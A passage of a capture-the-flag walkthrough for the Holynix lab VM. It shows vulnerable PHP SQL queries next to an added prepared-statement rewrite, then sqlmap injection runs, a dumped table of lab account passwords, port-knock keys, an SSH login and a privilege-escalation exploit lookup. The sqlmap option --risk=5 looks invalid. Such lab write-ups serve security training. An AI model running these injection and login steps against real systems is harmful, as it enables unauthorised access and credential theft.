    $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
    $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
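The same three lookups rewritten with bound parameters and a server-side session, as an added example that is not the VM's header.php or index.php. It assumes PHP 5.5 or later with mysqlnd (password_verify and mysqli_stmt::get_result), a mysqli connection $conn to the creds database, and an accounts.pwhash column holding password_hash() output; that column is invented here, the VM stores plaintext passwords.

```php
<?php
// Added example, not the VM's header.php or index.php: the three queries listed
// above rewritten with prepared statements, plus a server-side session in place
// of the client-editable "uid" cookie. Assumptions: PHP 5.5+ with mysqlnd
// (password_verify, mysqli_stmt::get_result), a mysqli connection $conn to the
// creds database, and an accounts.pwhash column holding password_hash() output
// (a constructed column; the VM stores plaintext).

session_start();

/** accounts row for $username, or null. The value is bound, never spliced into SQL text. */
function find_account(mysqli $conn, $username)
{
    $stmt = $conn->prepare('SELECT cid, username, upload, pwhash FROM accounts WHERE username = ?');
    $stmt->bind_param('s', $username);      // "' or (1=1)#" is now just a string to compare
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** Check credentials; on success bind the session to the account and return true. */
function login(mysqli $conn, $username, $password)
{
    $row = find_account($conn, $username);
    // Verify against a dummy hash when the user is unknown, so the response time
    // does not reveal which usernames exist.
    $hash = $row ? $row['pwhash'] : password_hash('not-a-real-password', PASSWORD_DEFAULT);
    if (!password_verify($password, $hash) || $row === null) {
        return false;
    }
    session_regenerate_id(true);            // fresh id once the privilege level changes
    $_SESSION['cid'] = (int) $row['cid'];
    return true;
}

/** The logged-in account from the session; a forged "Cookie: uid=N" header no longer matters. */
function current_user(mysqli $conn)
{
    if (!isset($_SESSION['cid'])) {
        return null;
    }
    $cid = (int) $_SESSION['cid'];
    $stmt = $conn->prepare('SELECT cid, username, upload FROM accounts WHERE cid = ?');
    $stmt->bind_param('i', $cid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** index.php's page lookup: the requested name must match a row in the page table exactly. */
function resolve_page(mysqli $conn, $page)
{
    if ($page === '') {
        return 'home.php';
    }
    $stmt = $conn->prepare('SELECT location FROM page WHERE location = ?');
    $stmt->bind_param('s', $page);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    // Only a location stored in the table can be included; traversal input simply finds no row.
    return ($row && file_exists($row['location'])) ? $row['location'] : '404.html';
}

$failedloginflag = 0;
if (isset($_POST['user_name'], $_POST['password'])) {
    if (login($conn, $_POST['user_name'], $_POST['password'])) {
        header('Location: index.php');
        exit;
    }
    $failedloginflag = 1;
}
if (isset($_GET['do']) && $_GET['do'] === 'logout') {
    $_SESSION = array();
    session_destroy();
    header('Location: index.php');
    exit;
}

$user = current_user($conn);
$auth = $user ? 1 : 0;
$logged_in_user = $user ? $user['username'] : 'anonymous';
$upload = $user ? (int) $user['upload'] : 0;
?>
```

The uid-cycling step from the enumeration section (editing the cookie to 1..11) has no equivalent here, since the account id lives only in the server-side session.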


sqlmap -u "http://192.168.56.102/index.php?page=login.php" --cookie="uid=2" --level=5 --risk=5
[WARNING] GET parameter 'page' is not injectable
[WARNING] Cookie parameter 'uid' is not injectable

sqlmap -u "http://192.168.56.102/index.php?page=login.php" --data="user_name=admin&password=pass&Submit_button=Submit"

--dbs

available databases [4]:                                                                                                                           
[*] clients
[*] creds
[*] information_schema
[*] mysql

--dump-all

cat /usr/share/sqlmap/output/192.168.56.102/dump/creds/accounts.csv

cid,upload,username,password
1,0,alamo,Ih%40cK3dM1cR05oF7
2,1,etenenbaum,P3n7%40g0n0wN3d
3,1,gmckinnon,d15cL0suR3Pr0J3c7
4,1,hreiser,Ik1Ll3dNiN%40r315er
5,1,jdraper,p1%40yIngW17hPh0n35
6,1,jjames,%40rR35t3D%40716
7,1,jljohansen,m%40k1nGb0o7L3g5
8,1,kpoulsen,wH%407ar37H3Fed5D01n
9,0,ltorvalds,f%407H3r0FL1nUX
10,1,mrbutler,n%405aHaSw0rM5
11,1,rtmorris,Myd%40d51N7h3NSA

Exploit ssh:
mkdir .knockknock && cd .knockknock && mkdir 192.168.56.102 && cd 192.168.56.102
echo WC8pOHq67KHzuYEvH9qPRA== > cipher.key
echo [main]> config
echo knock_port = 13821 >> config
echo 32 > counter
echo OcOlArxJEvH7iecDOZGAmw== > mac.key
root@kali:~/knockknock-0.7# python knockknock.py -p 22 192.168.56.102
*** Success: knock sent.
ssh gmckinnon@192.168.56.102
gmckinnon@192.168.56.102's password: <- d15cL0suR3Pr0J3c7
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
gmckinnon@holynix:~$

gmckinnon@holynix:~$ sudo -l
User gmckinnon may run the following commands on this host:
    (root) /bin/false

gmckinnon@holynix:~$ uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux

Next Phase: Privilege escalation......

root@kali:~# searchsploit changetrack
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Changetrack 4.3-3 Local Privilege Escalation Vulnerability                  /linux/local/9709.txt
